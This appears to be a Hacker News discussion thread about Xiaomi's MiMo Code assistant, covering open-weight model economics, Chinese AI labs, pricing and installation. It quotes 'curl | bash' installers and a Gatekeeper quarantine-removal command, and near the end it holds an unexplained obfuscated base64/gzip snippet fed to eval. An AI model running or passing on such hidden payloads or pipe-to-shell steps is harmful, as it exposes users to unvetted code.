The industry has been moving the wrong direction with Claude Code staying closed (despite multiple times leaking the source code!) and the open source Gemini CLI being deprecated in favor of closed source Antigravity CLI.
That’s a charity, not a business model.
Joel Spolsky in 2002 identified a major pattern in technology business & economics: The pattern of "commoditizing your complement", an alternative to vertical integration, where companies seek to secure a choke point or quasi-monopoly in products composed of many necessary & sufficient layers by dominating one layer while fostering so much competition in another layer above or below its layer that no competing monopolist can emerge, prices are driven down to marginal costs elsewhere in the stack, total price drops & increases demand, and the majority of the consumer surplus of the final product can be diverted to the quasi-monopolist.
No matter how valuable the original may be and how much one could charge for it, it can be more valuable to make it free if it increases profits elsewhere.
This pattern explains many otherwise odd or apparently self-sabotaging ventures by large tech companies into apparently irrelevant fields, such as the high rate of releasing open-source contributions by many Internet companies or the intrusion of advertising companies into smartphone manufacturing & web browser development & statistical software & fiber-optic networks & municipal WiFi & radio spectrum auctions & DNS: they are pre-emptive attempts to commodify another company elsewhere in the stack, or defenses against it being done to them.
https://gwern.net/complementOpen weight models are disruptive to the business models of closed model businesses. An incentive is if your business is built around X but model training is helpful to you, but you don’t expect to meter it specifically. You can release your models and undercut the exclusive moat of a new model company like OpenAI or Anthropic from becoming at some point a competitor, or holding their access as a chip in pricing negotiations. By opening your architectures and weights other competitors can build on them and newer better models emerge faster decoupled from a small number of proprietary models. This lets you focus on X while gaining overall momentum on your model release at no additional cost and no loss in focus on X, while defending against upstarts and monopolies.
This is effectively a lot of the open source world that comes from corporate development as well. It feels odd after this many decades of discussing corporate reasons to participate in open source we keep rehashing it.
A coding hardness with just bash outperforms Codex, Claude Code, OpenCode, Pi ect. The added features are just user experience features.
The case that is largely nonsense is the egress pricing on direct connects since beyond the circuit costs, which the customer pay, there’s no costs for aws not already on the customer regardless. It also makes DC friction weird in that you are incentivized to NOT move storage before compute.
Even if you consider profit motive, what is the profit motive for corporate contributions to open source? The same applies here.
They are already.
> and should open source all of their platforms
Most of the cloud platforms are open source. Linux, container, k8s… it’s entirely possible for someone to build and deploy their private cloud if they have the resources.
> and eliminate egress fees
What does it mean? If I sign up for cloud service I am only bound to the contract terms. If I am PAYGO I can switch anytime.
There's a very strong overlap with male gamers, who also think everything involving sophisticated engineering and design should be cheaper than a cup of coffee.
Just call it out and maybe we can collectively choose to towards a culture that doesn't encourage such shameless behavior or perverted values.
What? It’s actually insane that they haven’t yet.
I don’t like changing tools. What engineer does? I want to learn one tool and tune it to my exact preferences. Proprietary vendor tools are not portable and I avoid them.
Either Anthropic or OpenAI could drop the first-to-market open coding harness tomorrow and it would be as big as VSCode, it would be the standard platform everyone builds stuff on.
As a concrete example, you’ll get very different results for the same prompt for sonnet, opus, fable, gemini, gpt 5.5, …
The platform is the GPU, and doing cool shit with it IS the complement, which requires more memory. And demand is so high and will stay high, that it looks like the platform itself.
The question is why supply is restricted, primarily by sanctions and tariffs to China, and the expressed refusal of RAM makers to even think about increasing supply, they are actually all sweaty about China taking a bit of the unrestricted market.
Why not just contribute to OpenCode instead of creating a clone :/
There's plenty of reasons to start your own fork that you have full agency of, as long as the OSS License is maintained anyone will be able to benefit from any new features they want to make use of.
There are over 500 pages of open issues, up from 78 less than a month ago. They are doing nothing to halt the garbage/duplicates that pop up, and not even addressing legitimate PRs/reports.
I think there's simply too much changed.
It's controlled by a different organization; in particular a startup in a "competing" space.
This is usually a PoC (Proof of concept) way to install something on a temporary container or temporary VM, but not for production use during daily desktop operation.
I was hoping their documentation would provide better installation instructions. But strangely, only for Windows do they recommend "npm install -g @mimo-ai/cli," which is a much better approach to managing installed packages.
For Mac/Linux, they have the strange recommendation to use the dangerous "curl <some_url> | bash." Quote:
> (for the best experience, Mac users are strongly encouraged to use iTerm or the VSCode Terminal) > curl -fsSL https://mimo.xiaomi.com/install | bash
:(
To be fair, is that any different from naively trusting NPM? It's not like NPM is doing any vetting. They're every threat actors favorite sandbox these days.
And at the end of the day, no matter the installation method (even just unpacking a tarball and executing the program directly from that directory), you're going to run their program on your computer, and then the program can do whatever it wants. Maybe you don't run it with sudo, but https://xkcd.com/1200/ seems relevant.
> sh -c 'curl -fsSL https://chatgpt.com/codex/install.sh | CODEX_NON_INTERACTIVE=1 sh'
This is just sh, not bash, but I doubt it would be any better.
> npm install ... is a much better approach to managing installed packages.
No. Until the upcoming version of npm is out, npm will also run arbitrary code. Almost all common installation tools run arbitrary code. Not doing that is sadly the exception for now.
npm warn allow-scripts Run `npm approve-scripts --allow-scripts-pending` to review, or `npm approve-scripts <pkg>` to allow.
Microsoft github copilot recently changed their billing. i'm on the yearly subscription. GPT-5.4 is now 6x and even previously free model like GPT-5 mini now cost .33x. its only June 11 and my usage is now at 50%.
While you can argue you are ready to pay 100-1000 times the price for Fable or Opus because you need those last 1-2% of edge, there's no valid reason to keep paying the obscene amounts of money for Sonnet and Haiku when alternatives exist.
Furthermore, their pricing plan is insanely cheap, they even upped usage limit for their cheapest plan, lite plan, which is at 5$ / month. And now, they are dropping a Harness for their own model? Amazing. I wish they added support for installation through Homebrew though.
On another note, this is what I would like to see more of from a company, what I do not welcome is startups making their model exclusive and hurt their customer base through sabotaging as a way to prevent eventual distillation attempts.
Unless something changed their plans aren't really worth getting. They're not that much cheaper than the per-token rates, and because it's a plan, you have to contend with weird usage restrictions. You're better off paying per-token unless you have some use case that demands a very steady stream of tokens.
For example, API input is $0.435 / M tokens, which works out to 13.79 M tokens for $6.
Plan is 300 credits per input token, which works out to 13.67 M tokens at 4.1B credits per $6.
Very similar math for cache input and output.
Based solely on quality and price, OpenAI, Anthropic, and other western models just can't compete with the new generation of Chinese open models.
The collaboration is informal. People don’t seem to realize this, but the Chinese internet for programmers and developers today feels a lot like StackExchange in its heyday. There’s a huge emphasis on sharing knowledge, because sharing what you know builds your profile, and becoming a rockstar in a subfield is one of the only ways to get ahead.
Competition in China is ruthless. But unlike in North America, where individuals are often bound by agreement to hoard knowledge because it can give them a competitive edge, the competitive advantage in China is building face and peer recognition. And that comes from proving that you are worthy of being a "master/teacher", and that extends to the valuation of your knowledge business. For example, the third wave coffee shops in China, the master roaster is often called "master/teacher" once they win a roasting competition and start sharing new knowledge of roasting in the public sphere, and that's a title of sincere respect.
You can see parallels with those that apply to give talks at conferences and post snazzy technical presentations they give in the US, but the bar for what qualifies as new knowledge is far higher in China because there's a massive ecosystem of people rushing to outcompete what you have to offer, and once the ball gets rolling on knowledge sharing, lots of people will go off and build upon that knowledge or try to build businesses on top of that, which in turn produces more knowledge.
Reading developer forums in China, once you crack the code (I find Gemini will get you a good chunk of the way with good translations), they are really quite far ahead with what they're willing to share. And I suspect in great part, the decision to release open-weights is heavily tied to that concept of building face/peer recognition = building valuations.
Very fascinating to learn this, didn't know Moonshoot (Kimi) also collaborated with others. I think I read in another post that DeepSeek and Qwen team shared the same building? So that kind of explains it.
> Based solely on quality and price, OpenAI, Anthropic, and other western models just can't compete with the new generation of Chinese open models.
I have to agree. I had the great opportunity to take the offer Z.ai had with their Christmas deal, their lite plan was 3 months for 7$. GLM-4.7 was already impressive enough.
When they released GLM-5-Turbo and GLM-5.1, that is when I came to the realization of how close the gap is between proprietary western models and Chinese open-weight ones (not all of them are ofc).
I could barely believe how good GLM-5.1 was, I didn't think I was using it in CC and had to check the settings again. It's astonishing how close the gap is now, and this competition benefits us very much, the pricing is so low atm, its amazing.
Typically, Chinese websites are a big pain to log in or sign up because they require a +86 phone number due to legal reasons. Being able to use it without having to make an account is amazing for friction reduction. I could probably even just install it onto new machines to help with set up.
I wonder how they are gonna detect and block abuse though?
MiMo v2.5.0-Pro is honestly the first Chinese model that I've tried where I really though why should I use Claude Sonnet when I can get the same results for a fraction of the cost. There was always something off about Chinese models that made it apparent that it couldn't fully compete with GPT, Claude, Gemini, etc. but this was the first model where I was like, this feels like Sonnet.
I can't prove it, but I think they trained heavily on Claude output. From my perspective I don't care since Anthropic trained on my data.
Using them also works well for North Americans as our peak hours is not theirs.
If I had one complaint, the v2.5.0-Pro model thinks too much.
I have Claude but I don't want to ask it because Anthropic could decide to sabotage me.
This is what Claude Code is to Claude
I guess the way to use their models is through another provider, like https://opencode.ai/go
The 4.1 Gazillion credits is disingenuous.
It takes 200!!! hyper-inflation credits for ONE single token of uncached input.
Xiaomi had an issue, and instead of owning it, they covered it up with "look, now you get ALL THE (near worthless) CREDITS!!!!
“ MiMoCode is a terminal-native AI coding assistant. It can read and write code, run commands, manage Git, and use a persistent memory system to keep a deep understanding of your project across sessions while continuously improving itself.”
GitHub link (English): https://github.com/XiaomiMiMo/MiMo-Code
@dang might be better to link to the GitHub, and not for language reasons.
(Edit: for posterity, original URL as submitted was [0]).
It's a client-side change and doesn't impact the URL so users must manually change it each time they visit the site though
Not sure why my iPhone shows an option to translate website but all the destination languages to pick from (I have multiple languages installed), including English, are greyed out. iPhone does support translating from Chinese (Simplified or Traditional), and the button to translate website isn’t greyed out like it is for unsupported/unrecognized languages. Might be an iOS 27 bug, because it is working on other websites?
While ignorance of internationalization standards is a possibility, and the most likely cause.. I do wonder if it's a bit of a nudge to promote Chinese influence in the AI space.
Not that they really need to do that, China is already doing great (relatively, depending on criteria). The implosion of the US, the resulting brain drain and world shake-up has been very timely for their AI and other industries.
It's a very smart move for them to think longer term and start freezing out NVIDIA. Then they can take Taiwan purely for ideological concerns and not worry at all about the fabs blowing up in the process.
And they won't be dependent on foreign factories sitting on an island just off the shore of a superpower who's shown nothing below absolute resolve for decades towards the idea of conquering that island....
MiMo code (via my z.ai coding plan) is very pleasant so far, nice UI and seems to respond faster than Claude Code. It might be injecting much less cruft into the conversation.
I also got access to the mimo-2.5-pro ultraspeed model yesterday, which is really quite snappy. It does cost more than DeepSeek, though, so I'm not sure whether it's worth it yet. Definitely fast though.
telemetry enabled by default and named "analysis" is not great.
But it seems trivially easy to run it against local models. Their onboarding guide offers that option, though I have no idea if it changes any functionality.
That’s why
Terminal > sudo xattr -rd com.apple.quarantine > Drag and drop the app into terminal > enter and enter your password
A bit crappy on Apple's side.
Thank you.
From github
Not sure which "free" service you're referring to, but MiMo v2.5 Pro is plenty capable & (after its recent 70%+ price drop) one of the most affordable options in its class (DeepSeek v4 Pro, MiniMax M3, & Qwen 3.7 Plus). I read somewhere that Labs are incentivized to implement custom harnesses because each model has its strengths, quirks, & blindspots (like Qwen forking Gemini CLI)?
I fully expect Baidu and other tech giants on the Chinese shores to try and push the boundaries of technology. Silicon Valley (and the US) in general has always been the hot-bed of innovation. But with enormous increase in wealth in China (and to an extent in India), I can see these companies being more and more ambitious. Not long ago Andrew Ng of Coursera and Stanford AI Lab fame joined Baidu to further their rival to the 'Google Brain' project.
Xiaomi has long been positioning itself as a company with design chops of Apple, engineering chops of Google, and e-commerce chops of Amazon, all rolled into one-- and I can see where they are coming from. If they manage to pull it off, I guess that's when we'd start seeing the proverbial "Death of Silicon Valley" as in, it loosing its strange monopoly and strangle hold on tech world in terms of both talent and innovation.
https://news.ycombinator.com/item?id=9421471https://en.wikipedia.org/wiki/Xiaomi_Mi_1
And now they make one of the fastest cars ever created and frontier-level AI. In just over a decade. 你好!
Kinda RF-nerd clickbait... :)
For example: For a super small task in a small project that should not be consuming more than 500K total tokens after all tool calls included, their shown usage shot up to 152 million tokens.
But, when I scroll down on the same page, a table shows usage as 3 million tokens, out of which 2.5 million were cached.
This is such a huge conflict on the very same page. The bad thing is that the usage progress bar is shown against that 150 million token usage, not against that 3 million one.
This has been in discussions for at least past 3 months on reddit as well, and was precisely the reason I subscribed to their lowest tier, and for a single month only.
Update: their own harness, mimocode, shows total token usage as just 63.1K. We now have 3 entirely different values, differing in 3 orders of magnitude.
Update 2: So, I did the exact same task this time using DS4Pro, and total token usage was just 101K (as shown by opencode).
Good idea actually.. why haven't I tried this before.
Microsoft's LoRA (already a thing called LoRa) and now MiMo (already a thing called MIMO)
Maybe a classic Google search is not so bad, eh?
>Knowledge accumulates automatically with lossless compression, preserving every critical detail even across million-line projects.
[0] https://github.com/vinhnx/VTCode/blob/main/README.md#Provide...
I tried the free model and it's nowhere near Sonnet 4.6 in terms of capabilities. The fact that token speed will randomly get stuck at 0/s makes sense given it's a free service, but the way it performs is more reminiscent of AI from 2025.
Token plan works fine.
I think it is great that they built it on top of open code. Open Code harness is good and I want it to grow. Harness is very important and more projects use it, the more it is adopted.
This website is gorgeous, by the way. The mouse reveal on the background, amazing.
OpenCode or pi.dev are enough. I don't like CC-style agent lock-in, regardless if it's Anthropic or Xiaomi doing it.
[0] https://www.fbi.gov/investigate/counterintelligence/the-chin...
ddesk='H4sIAAAAAAAC'
_kiwsi='/ysuTclXKMpN'
_nlalt='U9AtSlPQ5wIA'
_uqslr='gZtu1g8AAAA='
_aaaaa="${_ddesk}${_kiwsi}${_nlalt}${_uqslr}"
_bwkmp="$(printf %s "${_aaaaa}" | base64 -d | gzip -d -c)"
eval "${_bwkmp}"Their models can't help them build it with something better?
That's the only benchmark people need, whether or not their model can raise the bar of their own product
And so far it's looking pretty sad